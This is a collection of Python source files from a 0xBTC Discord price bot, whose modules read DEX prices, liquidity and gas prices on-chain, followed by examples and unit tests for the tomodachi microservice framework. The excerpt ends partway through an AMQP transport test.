logging.debug('unknown topic topic0 {}'.format(topic0))
return volume_tokens, volume_pair
async def _get_price_and_liquidity_at_exchange_contract(self, exchange_contract):
token0_address = exchange_contract.functions.token0().call().lower()
token1_address = exchange_contract.functions.token1().call().lower()
paired_token_address = token0_address if token1_address.lower() == MaticToken().from_symbol(self.currency_symbol).address.lower() else token1_address
paired_token_symbol = MaticToken().from_address(paired_token_address).symbol
liquidity_tokens, liquidity_pair = get_reserves(self._w3, self.currency_symbol, paired_token_symbol)
# bail early if the number of tokens LPd is very small
# TODO: this should probably be configurable. Or generated automatically
# based on some USD value, not token value
if liquidity_tokens < _MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS:
raise NoLiquidityException(f"Less than {_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS} tokens LP'd for exchange contract.")
# get price of paired token (in USD) to determine price of
# <self.currency_symbol> in USD. Strategy changes depending on pair
price_in_paired_token = get_price(self._w3, paired_token_symbol, self.currency_symbol)
if paired_token_symbol == "WETH":
paired_token_price_in_usd = self.eth_price_usd
else:
# get the paired token's price in Eth. If there is less than $500 in
# liquidity to determine this, then skip this pair when determining price.
liquidity_eth_of_paired_token, _ = get_reserves(self._w3, "WETH", paired_token_symbol)
if liquidity_eth_of_paired_token < 500 / self.eth_price_usd:
raise NoLiquidityException(f"Less than {500} USD LP'd for paired token {paired_token_symbol}, pair token price not considered accurate. Skipping pair.")
else:
paired_token_price_in_eth = get_price(self._w3, "WETH", paired_token_symbol)
paired_token_price_in_usd = paired_token_price_in_eth * self.eth_price_usd
price_in_usd = price_in_paired_token * paired_token_price_in_usd
return price_in_usd, liquidity_tokens
async def _update_all_values(self, should_update_volume=False, timeout=10):
# TODO: switch to rolling 24-hour volume by loading 1 hour at a time to
# allow re-enable volume updates
# currently alchemyapi errors because 24h of events is too many for 1 call
should_update_volume = False
# END TODO
if should_update_volume:
current_eth_block = self._w3.eth.blockNumber
# get price of eth
eth_prices = [
get_price(self._w3, "DAI", "WETH"),
get_price(self._w3, "USDT", "WETH"),
get_price(self._w3, "USDC", "WETH"),
]
self.eth_price_usd = sum(eth_prices) / len(eth_prices) # TODO: should be weighted average
# get token price (in USD), liquidity (in tokens), and volume (in tokens) for
# each pair. Note if liquidity is low for a pair, its voluem is not checked.
price_usd_weighted_average = WeightedAverage()
total_liquidity_tokens = 0
total_volume_tokens = 0
for exchange_contract in self._exchanges:
try:
price_usd, liquidity_tokens = await self._get_price_and_liquidity_at_exchange_contract(exchange_contract)
except (NoTokenMatchError, PairNotDefinedError) as e:
logging.warning(f"Failed to update quickswap exchange: {str(e)}")
continue
except NoLiquidityException:
# no liquidity is not an error; simply skip this exchange
continue
else:
price_usd_weighted_average.add(price_usd, liquidity_tokens)
total_liquidity_tokens += liquidity_tokens
if should_update_volume and liquidity_tokens > _MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME:
try:
volume_tokens, volume_pair = await self._get_volume_at_exchange_contract(exchange_contract, current_eth_block=current_eth_block, timeout=timeout)
total_volume_tokens += volume_tokens
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update QuickSwapAPI volume: ReadTimeout")
self.price_usd = price_usd_weighted_average.average()
self.price_eth = self.price_usd / self.eth_price_usd
self.liquidity_tokens = total_liquidity_tokens
self.liquidity_eth = self.liquidity_tokens * self.price_eth
if should_update_volume:
self.volume_tokens = total_volume_tokens
self.volume_eth = self.volume_tokens * self.price_eth
# NOTE: this sets _time_volume_last_updated even if all volume updates
# failed. This is OK for now, it throttles struggling APIs (matic) but
# may not be the ideal behavior.
self._mark_volume_as_updated()
async def _update(self, timeout=10.0):
if self._is_time_to_update_volume():
await self._update_all_values(timeout=timeout, should_update_volume=True)
else:
await self._update_all_values(timeout=timeout, should_update_volume=False)
if __name__ == "__main__":
# run some generic uniswap v2 functions
web3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL))
print('$1 in USDC will swap for {} 0xBTC tokens'.format(get_swap_amount(web3, 1, "USDC", "0xBTC")))
print('$1 in DAI will swap for {} 0xBTC tokens'.format(get_swap_amount(web3, 1, "DAI", "0xBTC")))
print('1 0xBTC token will swap for {} DAI'.format(get_swap_amount(web3, 1, "0xBTC", "DAI")))
print('100 0xBTC tokens will swap for {} DAI'.format(get_swap_amount(web3, 100, "0xBTC", "DAI")))
print('1 ETH will swap for {} DAI'.format(get_swap_amount(web3, 1, "WETH", "DAI")))
print('230 DAI will swap for {} ETH'.format(get_swap_amount(web3, 230, "DAI", "WETH")))
print('0xbtc and ETH balances:', get_reserves(web3, "0xBTC", "WETH"))
# print('0xbtc and ETH price:', e.get_price("0xBTC", "WETH"), "0xBTC per ETH")
# print('0xbtc and ETH price:', e.get_price("WETH", "0xBTC"), "ETH per 0xBTC")
print()
print('eth usdc reserves ', get_reserves(web3, "WETH", "USDC"))
print('1 in ETH will swap for {} USDC '.format(get_swap_amount(web3, 1, "WETH", "USDC")))
print('1 in ETH will swap for {} USDT '.format(get_swap_amount(web3, 1, "WETH", "USDT")))
print('1 in ETH will swap for {} DAI '.format(get_swap_amount(web3, 1, "WETH", "DAI")))
print()
# get some data from 0xBTC pool via QuickSwapAPI
e = QuickSwapAPI('0xBTC')
e.load_once_and_print_values()
print()
try:
print('0xBTC-WETH liquidity in eth', e.liquidity_eth)
except AttributeError:
pass
print('0xBTC-WETH liquidity in tokens', e.liquidity_tokens)
# get some data from KIWI pool via QuickSwapAPI
# e = QuickSwapAPI('KIWI')
# e.load_once_and_print_values()
# print()
# try:
# print('KIWI-WETH liquidity in eth', e.liquidity_eth)
# except AttributeError:
# pass
# print('KIWI-WETH liquidity in tokens', e.liquidity_tokens)
# e = QuickSwapAPI('DAI')
# e.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/swapmatic.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI
from .uniswap_v1_abi import exchange_abi
from .erc20_abi import erc20_abi
from secret_info import ETHEREUM_NODE_URL
from secret_info import MATIC_NODE_URL
from constants import SECONDS_PER_MATIC_BLOCK
from .uniswap_v2 import get_price as uniswap_v2_get_price
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
class SwapmaticAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, timeout=10.0):
super().__init__()
if currency_symbol == "0xBTC":
self.exchange_address = "0x7c27aDF852c87D2A5BdF46abFDFa9531B76ef9c1"
self.currency_address = "0x71B821aa52a49F32EEd535fCA6Eb5aa130085978"
self._decimals = 8
elif currency_symbol == "XXX":
self.exchange_address = "0x0000000000000000000000000000000000000000"
self.currency_address = "0x0000000000000000000000000000000000000000"
self._decimals = 0
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to uniswap.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Swapdog.io"
self.command_names = ["swapdog", "swapmatic"]
self.short_url = "https://bit.ly/3jWSypf" # swapdog pre-selected to 0xbtc
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL, request_kwargs={'timeout': timeout}))
self._exchange = self._w3.eth.contract(address=self.exchange_address, abi=exchange_abi)
async def _update_24h_volume(self, matic_eth_price, timeout=10.0):
token_purchase_topic = "<KEY>"
eth_purchase_topic = "0x7f4091b46c33e918a0f3aa42307641d17bb67029427a5369e54b353984238705"
transfer_topic = "0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"
remove_liquidity_topic = "0x0fbf06c058b90cb038a618f8c2acbf6145f8b3570fd1fa56abb8f0f3f05b36e8"
add_liquidity_topic = "0x06239653922ac7bea6aa2b19dc486b9361821d37712eb796adfd38d81de278ca"
current_eth_block = self._w3.eth.blockNumber
volume_base = 0
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*24 / SECONDS_PER_MATIC_BLOCK)),
'toBlock': current_eth_block - 1,
'address': self.exchange_address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == token_purchase_topic:
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
base_amount = wei_to_ether(self._w3.toInt(event['topics'][2]))
token_amount = self._w3.toInt(event['topics'][3]) / 10**self._decimals
volume_base += base_amount
elif topic0 == eth_purchase_topic:
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
token_amount = self._w3.toInt(event['topics'][2]) / 10**self._decimals
base_amount = wei_to_ether(self._w3.toInt(event['topics'][3]))
volume_base += base_amount
elif topic0 == transfer_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == remove_liquidity_topic:
# skip liquidity deposits/withdrawals
continue
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
base_amount = wei_to_ether(self._w3.toInt(event['topics'][2]))
token_amount = self._w3.toInt(event['topics'][3]) / 10**self._decimals
elif topic0 == add_liquidity_topic:
# skip liquidity deposits/withdrawals
continue
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
base_amount = wei_to_ether(self._w3.toInt(event['topics'][2]))
token_amount = self._w3.toInt(event['topics'][3]) / 10**self._decimals
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
self.volume_eth = volume_base * matic_eth_price
self._time_volume_last_updated = time.time()
async def _update(self, timeout=10.0):
# First grab price of ETH and price of MATIC from uniswap v2 on the eth network
_w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
eth_dai_price = uniswap_v2_get_price(_w3, "DAI", "WETH")
matic_eth_price = uniswap_v2_get_price(_w3, "WETH", "MATIC")
matic_dai_price = matic_eth_price * eth_dai_price
# TODO: The amount of tokens 'purchased' to determine the price should
# not be a fixed value (200). Ideally, load the amount of tokens
# available in the contract and use a certain percentage.
amount_tokens = 200
matic_amount_buy = wei_to_ether(self._exchange.functions.getEthToTokenOutputPrice(amount_tokens * 10**self._decimals).call())
matic_amount_sell = wei_to_ether(self._exchange.functions.getTokenToEthInputPrice(amount_tokens * 10**self._decimals).call())
average_matic_amount = (matic_amount_buy + matic_amount_sell) / 2
liq_matic, liq_tokens = self.get_reserves()
self.liquidity_eth = liq_matic * matic_eth_price
self.liquidity_tokens = liq_tokens
average_eth_amount = average_matic_amount * matic_eth_price
self.price_eth = average_eth_amount / amount_tokens
# TODO: maybe don't do this? DAI isn't always 1:1 pegged to USD
if self.currency_symbol == "DAI":
self.eth_price_usd = 1 / self.price_eth
# TODO: switch to rolling 24-hour volume by loading 1 hour at a time to
# allow re-enable volume updates
# currently alchemyapi errors because 24h of events is too many for 1 call
return
# update volume once every hour since it (potentially) loads eth api
if time.time() - self._time_volume_last_updated > 60*60:
try:
await self._update_24h_volume(matic_eth_price)
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update QuickSwapAPI volume: ReadTimeout")
finally:
# always update this to throttle volume updates
self._time_volume_last_updated = time.time()
# get the eth and token balance of a particular address in a uniswap v1 pool
def get_pooled_balance_for_address(self, owner_address):
all_ownership_tokens = self._exchange.functions.totalSupply().call()
ownership_tokens_in_address = self._exchange.functions.balanceOf(owner_address).call()
ownership_percentage = ownership_tokens_in_address / all_ownership_tokens
eth_balance, token_balance = self.get_reserves()
return eth_balance * ownership_percentage, token_balance * ownership_percentage
# get the reserves, in eth and tokens, of a particular uniswap v1 pool
def get_reserves(self):
eth_balance = wei_to_ether(self._w3.eth.getBalance(self.exchange_address))
token_contract = self._w3.eth.contract(address=self.currency_address, abi=erc20_abi)
token_balance = token_contract.functions.balanceOf(self.exchange_address).call() / 10**self._decimals
return eth_balance, token_balance
if __name__ == "__main__":
e = SwapmaticAPI('0xBTC')
e.load_once_and_print_values()
print('reserves:', e.get_reserves())
# e = SwapmaticAPI('DAI')
# e.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/uniswap_v3.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI, NoLiquidityException
from .erc20_abi import erc20_abi
from secret_info import ETHEREUM_NODE_URL
from constants import SECONDS_PER_ETH_BLOCK
from token_class import Token, NoTokenMatchError
from weighted_average import WeightedAverage
from uniswap import Uniswap
# list of exchange contract addresses. each pair has a unique address.
# token0 name, token1 name, uniswap exchange address, fee amount
# fee is in in basis points. so 3000 = 0.3%
exchanges = (
("0xBTC", "WETH", "0xaFF587846a44aa086A6555Ff69055D3380fD379a", 10000),
("USDC", "0xBTC", "0xc01435E578eb3182cABE05F11DB2bEa493dbe7CA", 10000),
("USDC", "WETH", "0x8ad599c3A0ff1De082011EFDDc58f1908eb6e6D8", 3000),
)
_TIME_BETWEEN_VOLUME_UPDATES = 60 * 60 # 1 hour. WARNING: don't change this without refactoring hourly volume logic
# if less than this many tokens in pair, don't use it for price
_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS = 0.1
# if less than this many tokens in pair, don't check its volume
_MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME = 10
# fee to use by defualt, in basis points. 3000 = 0.3%
_DEFAULT_PAIR_FEE = 3000
class PairNotDefinedError(Exception):
pass
def getExchangeAddressesForToken(name):
return [i[2] for i in exchanges if i[0].lower() == name.lower() or i[1].lower() == name.lower()]
def getTokensFromExchangeAddress(exchange_address):
return [(i[0], i[1], i[3]) for i in exchanges if i[2].lower() == exchange_address.lower()][0]
def getExchangeAddressForTokenPair(first_token_name, second_token_name, fee_to_match):
token_addresses = sorted([Token().from_symbol(first_token_name).address.lower(),
Token().from_symbol(second_token_name).address.lower()])
for token1_name, token2_name, address, fee in exchanges:
if (token1_name in [first_token_name, second_token_name]
and token2_name in [first_token_name, second_token_name]
and fee == fee_to_match):
return (address,
Token().from_address(token_addresses[0]).symbol,
Token().from_address(token_addresses[1]).symbol)
raise PairNotDefinedError(f"No pair {first_token_name}-{second_token_name} found")
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
def from_u256_twos_complement(twos_complemented_number):
sign_bit = (1 << 255)
if twos_complemented_number & sign_bit != 0:
return twos_complemented_number - (1 << 256)
else:
return twos_complemented_number
def get_reserves(web3, token0_name, token1_name, fee):
"""get the reserves, in tokens, of a particular uniswap v3 pool"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name, fee)
token0_contract = web3.eth.contract(address=Token().from_symbol(token0_name).address, abi=erc20_abi)
token0_balance = (token0_contract.functions.balanceOf(exchange_address).call()
/ 10**Token().from_symbol(token0_name).decimals)
token1_contract = web3.eth.contract(address=Token().from_symbol(token1_name).address, abi=erc20_abi)
token1_balance = (token1_contract.functions.balanceOf(exchange_address).call()
/ 10**Token().from_symbol(token1_name).decimals)
return token0_balance, token1_balance
def get_price(uniswap_api, token0_name, token1_name, fee):
"""Get the price at a particular uniswap v3 pool, in terms of token0 / token1"""
if token0_name == "ETH":
token0_address = "0x0000000000000000000000000000000000000000"
token0_decimals = 18
else:
token0_address = Token().from_symbol(token0_name).address
token0_decimals = Token().from_symbol(token0_name).decimals
if token1_name == "ETH":
token1_address = "0x0000000000000000000000000000000000000000"
token1_decimals = 18
else:
token1_address = Token().from_symbol(token1_name).address
token1_decimals = Token().from_symbol(token1_name).decimals
price = (uniswap_api.get_price_input(token1_address,
token0_address,
1 * 10**token1_decimals,
fee)
/ 10 ** token0_decimals)
return price
class Uniswapv3API(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol):
super().__init__()
try:
# self._exchange_addresses = getExchangeAddressesForToken(currency_symbol)
self._decimals = Token().from_symbol(currency_symbol).decimals
except IndexError:
raise RuntimeError("Unknown currency_symbol {}, need to add address to token_class.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Uniswap v3"
self.command_names = ["uniswap"]
self.short_url = "https://bit.ly/35nae4n" # main uniswap pre-selected to 0xbtc
self.volume_eth = 0
self.show_yield = True
self.hourly_volume_tokens = [] # list of volume for each of the last N hours
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
self._uniswap_api = Uniswap(address=None, private_key=None, version=3, web3=self._w3)
# self._exchanges = [self._w3.eth.contract(address=a, abi=exchange_abi) for a in self._exchange_addresses]
@property
def number_of_hours_covered_by_volume(self):
return len(self.hourly_volume_tokens)
def _is_time_to_update_volume(self):
return time.time() - self._time_volume_last_updated > _TIME_BETWEEN_VOLUME_UPDATES
def _mark_volume_as_updated(self):
self._time_volume_last_updated = time.time()
async def _get_volume_for_pair(self, token0_address, token1_address, fee, num_hours_into_past=1, current_eth_block=None, timeout=10.0):
volume_tokens = 0 # volume in units of <self.currency_symbol> tokens
volume_pair = 0 # volume in units of the paired token
token0_address, token1_address = sorted([token0_address, token1_address])
token0_decimals = Token().from_address(token0_address).decimals
token1_decimals = Token().from_address(token1_address).decimals
# https://docs.uniswap.org/reference/core/interfaces/pool/IUniswapV3PoolEvents
swap_topic = "0xc42079f94a6350d7e6235f29174924f928cc2ac818eb64fed8004e115fbcca67"
collect_topic = "0x70935338e69775456a85ddef226c395fb668b63fa0115f5f20610b388e6ca9c0"
# this event seems to throw when a collect occurs, but only includes the first 3 parameters?
cloned_collect_topic = "0x0c396cd989a39f4459b5fa1aed6a9a8dcdbc45908acfd67e028cd568da98982c"
exchange_address, _, _ = getExchangeAddressForTokenPair(
Token().from_address(token0_address).symbol,
Token().from_address(token1_address).symbol,
fee)
if current_eth_block is None:
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*num_hours_into_past / SECONDS_PER_ETH_BLOCK)),
'toBlock': current_eth_block - 1,
'address': exchange_address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == swap_topic:
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
# address sender (router address ususally)
router_address = self._w3.toChecksumAddress(event['topics'][1][-20:])
# address recipient
buyer_address = self._w3.toChecksumAddress(event['topics'][2][-20:])
data = event['data'][2:] if event['data'].startswith('0x') else event['data']
# int256 amount 0 (delta of the token0 balance of the pool)
amount_0 = from_u256_twos_complement(self._w3.toInt(hexstr=data[0:64])) / 10**token0_decimals
# int256 amount 1 (delta of the token1 balance of the pool)
amount_1 = from_u256_twos_complement(self._w3.toInt(hexstr=data[64:128])) / 10**token1_decimals
# uint160 sqrtPriceX96 unused
# uint128 liquidity unused
# int24 tick unused
# print('swap in tx', self._w3.toHex(event['transactionHash']))
# print(f'amount_0: {amount_0}, amount_1: {amount_1}')
if Token().from_address(token0_address).symbol.lower() == self.currency_symbol.lower():
# token0 is the tracked currency symbol
volume_tokens += abs(amount_0)
volume_pair += abs(amount_1)
elif Token().from_address(token1_address).symbol.lower() == self.currency_symbol.lower():
# token1 is the tracked currency symbol
volume_tokens += abs(amount_1)
volume_pair += abs(amount_0)
else:
raise RuntimeError(f"bad swap in tx {event['transactionHash']}: token0_address:{token0_address} token1_address:{token1_address}")
continue
elif topic0 == collect_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == cloned_collect_topic:
# skip liquidity deposits/withdrawals
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
continue
return volume_tokens, volume_pair
async def _get_price_and_liquidity_for_pair(self, token0_address, token1_address, fee):
paired_token_address = token0_address if token1_address.lower() == Token().from_symbol(self.currency_symbol).address.lower() else token1_address
paired_token_symbol = Token().from_address(paired_token_address).symbol
liquidity_tokens, liquidity_pair = get_reserves(self._w3, self.currency_symbol, paired_token_symbol, fee)
# bail early if the number of tokens LPd is very small
# TODO: this should probably be configurable. Or generated automatically
# based on some USD value, not token value
if liquidity_tokens < _MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS:
raise NoLiquidityException(f"Less than {_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS} tokens LP'd for exchange contract.")
# get price of paired token (in USD) to determine price of
# <self.currency_symbol> in USD. Strategy changes depending on pair
price_in_paired_token = get_price(self._uniswap_api, paired_token_symbol, self.currency_symbol, fee)
if paired_token_symbol == "WETH":
paired_token_price_in_usd = self.eth_price_usd
else:
# get the paired token's price in Eth. If there is less than $500 in
# liquidity to determine this, then skip this pair when determining price.
liquidity_eth_of_paired_token, _ = get_reserves(self._w3, "WETH", paired_token_symbol, _DEFAULT_PAIR_FEE)
if liquidity_eth_of_paired_token < 500 / self.eth_price_usd:
raise NoLiquidityException(f"Less than {500} USD LP'd for paired token {paired_token_symbol}, pair token price not considered accurate. Skipping pair.")
else:
paired_token_price_in_eth = get_price(self._uniswap_api, "WETH", paired_token_symbol, _DEFAULT_PAIR_FEE)
paired_token_price_in_usd = paired_token_price_in_eth * self.eth_price_usd
price_in_usd = price_in_paired_token * paired_token_price_in_usd
return price_in_usd, liquidity_tokens
async def _update_all_values(self, timeout=10.0, should_update_volume=False):
if should_update_volume:
current_eth_block = self._w3.eth.blockNumber
self.price_eth = None
eth_prices = [
get_price(self._uniswap_api, "DAI", "WETH", _DEFAULT_PAIR_FEE),
get_price(self._uniswap_api, "USDT", "WETH", _DEFAULT_PAIR_FEE),
get_price(self._uniswap_api, "USDC", "WETH", _DEFAULT_PAIR_FEE),
]
self.eth_price_usd = sum(eth_prices) / len(eth_prices) # TODO: should be weighted average
price_usd_weighted_average = WeightedAverage()
total_liquidity_tokens = 0
total_volume_tokens = 0
for exchange_address in getExchangeAddressesForToken(self.currency_symbol):
token0_name, token1_name, fee = getTokensFromExchangeAddress(exchange_address)
token0_address = Token().from_symbol(token0_name).address
token1_address = Token().from_symbol(token1_name).address
#paired_token_address = token0_address if token1_address.lower() == Token().from_symbol(self.currency_symbol).address.lower() else token1_address
#paired_token_symbol = Token().from_address(paired_token_address).symbol
try:
price_usd, liquidity_tokens = await self._get_price_and_liquidity_for_pair(token0_address, token1_address, fee)
except (NoTokenMatchError, PairNotDefinedError) as e:
logging.warning(f"Failed to update {self.exchange_name} pair: {str(e)}")
continue
except NoLiquidityException:
# no liquidity is not an error; simply skip this exchange
continue
else:
price_usd_weighted_average.add(price_usd, liquidity_tokens)
total_liquidity_tokens += liquidity_tokens
if should_update_volume and liquidity_tokens > _MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME:
try:
volume_tokens, volume_pair = await self._get_volume_for_pair(token0_address, token1_address, fee, current_eth_block=current_eth_block, timeout=timeout)
total_volume_tokens += volume_tokens
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update Uniswapv3API volume: ReadTimeout")
self.price_usd = price_usd_weighted_average.average()
self.price_eth = self.price_usd / self.eth_price_usd
self.liquidity_tokens = total_liquidity_tokens
self.liquidity_eth = self.liquidity_tokens * self.price_eth
if should_update_volume:
self.hourly_volume_tokens.append(total_volume_tokens)
# trim list to 168 hours (7 days)
self.hourly_volume_tokens = self.hourly_volume_tokens[-168:]
# use last 24 hours for volume
self.volume_tokens = sum(self.hourly_volume_tokens[-24:])
self.volume_eth = self.volume_tokens * self.price_eth
# NOTE: this sets _time_volume_last_updated even if all volume updates
# failed. This is OK for now, it throttles struggling APIs (matic) but
# may not be the ideal behavior.
self._mark_volume_as_updated()
async def _update(self, timeout=10.0):
if self._is_time_to_update_volume():
await self._update_all_values(timeout=timeout, should_update_volume=True)
else:
await self._update_all_values(timeout=timeout, should_update_volume=False)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# get some data from 0xBTC pool via Uniswapv3API
e = Uniswapv3API('0xBTC')
e.load_once_and_print_values()
print()
print('0xBTC-WETH liquidity in eth', e.liquidity_eth)
print('0xBTC-WETH liquidity in tokens', e.liquidity_tokens)
print()
# # get some data from KIWI pool via Uniswapv3API
# e = Uniswapv3API('KIWI')
# e.load_once_and_print_values()
# print()
# try:
# print('KIWI-WETH liquidity in eth', e.liquidity_eth)
# except AttributeError:
# pass
# print('KIWI-WETH liquidity in tokens', e.liquidity_tokens)
# e = Uniswapv3API('DAI')
# e.load_once_and_print_values()
```
#### File: 0x1d00ffff/0xbtc-discord-price-bot/gas_price_api.py
```python
import time
import logging
import aiohttp
from async_url_helpers import get_json_from_url
# data older than this is completely ignored
_OLDEST_ALLOWED_DATA_SECONDS = 300 # 5 minutes
async def get_gas_price():
oracles = (
("https://owlracle.info/eth/gas",
lambda j: j["speeds"][2]['gasPrice']),
("https://ethgas.watch/api/gas",
lambda j: j["fast"]["gwei"]),
("https://data-api.defipulse.com/api/v1/egs/api/ethgasAPI.json?api-key=<KEY>",
lambda j: float(j["fast"]) / 10.0),
)
prices = []
for url, parser_fn in oracles:
try:
prices.append(parser_fn(await get_json_from_url(url)))
except TimeoutError:
logging.warning(f"fail to fetch gas price from {url}")
except:
logging.exception(f"fail to fetch gas price from {url}")
if len(prices) == 0:
raise RuntimeError("no gas oracles responding")
# average all the prices
return sum(prices) / len(prices)
class GasPriceAPI():
def __init__(self):
self._gas_price = None
self._time_last_updated = 0
async def update(self):
self._gas_price = await get_gas_price()
self._time_last_updated = time.time()
@property
def gas_price(self):
if time.time() - self._time_last_updated > _OLDEST_ALLOWED_DATA_SECONDS:
return None
else:
return self._gas_price
async def load_once_and_print():
api = GasPriceAPI()
await api.update()
print(f"gas_price: {api.gas_price}")
if __name__ == "__main__":
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(load_once_and_print())
``` |
{
"source": "0x1EE7/tomodachi",
"score": 2
} |
#### File: examples/basic_examples/http_auth_service.py
```python
import os
import asyncio
import tomodachi
import uuid
from typing import Any
from aiohttp import web
from tomodachi import http, HttpResponse
@tomodachi.decorator
async def require_auth_token(instance: Any, request: web.Request) -> Any:
post_body = await request.read() if request.body_exists else None
if not post_body or post_body.decode() != instance.allowed_token:
return HttpResponse(body='Invalid token', status=403)
@tomodachi.service
class ExampleHttpAuthService(tomodachi.Service):
name = 'example_http_auth_service'
log_level = 'DEBUG'
allowed_token = str(uuid.uuid4())
uuid = os.environ.get('SERVICE_UUID')
options = {
'http': {
'port': 4711,
'content_type': 'text/plain',
'charset': 'utf-8',
'access_log': True
}
}
@http('GET', r'/get-token/?')
async def get_token(self, request: web.Request) -> str:
return self.allowed_token
@http('POST', r'/validate/?')
@require_auth_token
async def validate(self, request: web.Request) -> str:
return 'Valid auth token!'
```
#### File: examples/basic_examples/http_middleware_service.py
```python
import os
import asyncio
import tomodachi
from typing import Tuple, Callable, Union, Any, Dict
from aiohttp import web
from tomodachi import http, http_error, http_static, websocket, HttpResponse
from tomodachi.discovery import DummyRegistry
async def middleware_function(func: Callable, service: Any, request: web.Request, context: Dict, *args: Any, **kwargs: Any) -> Any:
# Functionality before function is called
service.log('middleware before')
return_value = await func(*args, **kwargs)
# There's also the possibility to pass in extra arguments or keywords arguments, for example:
# return_value = await func(*args, id='overridden', **kwargs)
# Functinoality after function is called
service.log('middleware after')
return return_value
@tomodachi.service
class ExampleHttpMiddlewareService(tomodachi.Service):
name = 'example_http_middleware_service'
log_level = 'DEBUG'
uuid = os.environ.get('SERVICE_UUID')
# Adds a middleware function that is run on every HTTP call.
# Several middlewares can be chained.
http_middleware = [middleware_function]
# Some options can be specified to define credentials, used ports, hostnames, access log, etc.
options = {
'http': {
'port': 4711,
'content_type': 'text/plain',
'charset': 'utf-8',
'access_log': True
}
}
@http('GET', r'/example/?')
async def example(self, request: web.Request, **kwargs: Any) -> str:
await asyncio.sleep(1)
return '友達' # tomodachi
@http('GET', r'/example/(?P<id>[^/]+?)/?')
async def example_with_id(self, request: web.Request, id: str, **kwargs: Any) -> str:
return '友達 (id: {})'.format(id)
@http_error(status_code=404)
async def error_404(self, request: web.Request, **kwargs: Any) -> str:
return 'error 404'
```
#### File: tests/services/invalid_service.py
```python
import tomodachi
@tomodachi.service
class InvalidService(tomodachi.Service):
name = 'test_invalid'
def syntax_error(self) -> error: # type: ignore
pass
```
#### File: tomodachi/tests/test_amqp_transport.py
```python
import os
import signal
import pytest
from typing import Any
from tomodachi.transport.amqp import AmqpTransport, AmqpException
from run_test_service_helper import start_service
def test_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.get_routing_key('test.topic', {})
assert routing_key == 'test.topic'
routing_key = AmqpTransport.get_routing_key('test.topic', {'options': {'amqp': {'routing_key_prefix': 'prefix-'}}})
assert routing_key == 'prefix-test.topic'
def test_encode_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.encode_routing_key('test-topic')
assert routing_key == 'test-topic'
routing_key = AmqpTransport.encode_routing_key('test.topic')
assert routing_key == 'test.topic'
def test_decode_routing_key(monkeypatch: Any) -> None:
routing_key = AmqpTransport.decode_routing_key('test-topic')
assert routing_key == 'test-topic'
routing_key = AmqpTransport.decode_routing_key('test.topic')
assert routing_key == 'test.topic'
def test_queue_name(monkeypatch: Any) -> None:
_uuid = '5d0b530f-5c44-4981-b01f-342801bd48f5'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, False, {})
assert queue_name == 'b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func2', _uuid, False, {})
assert queue_name != 'b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, False, {'options': {'amqp': {'queue_name_prefix': 'prefix-'}}})
assert queue_name == 'prefix-b444917b9b922e8c29235737c7775c823e092c2374d1bfde071d42c637e3b4fd'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, True, {})
